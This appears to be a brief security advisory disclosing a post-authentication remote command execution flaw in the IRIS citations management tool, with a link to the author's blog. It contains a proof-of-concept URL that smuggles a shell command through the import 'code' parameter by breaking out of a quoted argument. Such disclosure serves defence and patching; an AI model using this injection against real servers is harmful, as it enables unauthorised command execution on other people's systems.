IRIS Citations management tool suffers from a remote command execution vulnerability.
e789e15c69c2329a965883f322fff813ff1f36966e788f2e72e60793bc951b08
A vulnerability exists in IRIS citations management tool which allows a low privileged attacker to execute arbitrary commands.
Details can be found on my blog:
https://infosecabsurdity.wordpress.com/2013/02/09/iris-citations-management-tool-post-auth-remote-command-execution/
PoC:
http://[target]/[path]/index.php?p=add&import=spnro&code=a"+-T+0.1+||echo+`id`+>+/tmp/luls||"
~ aeon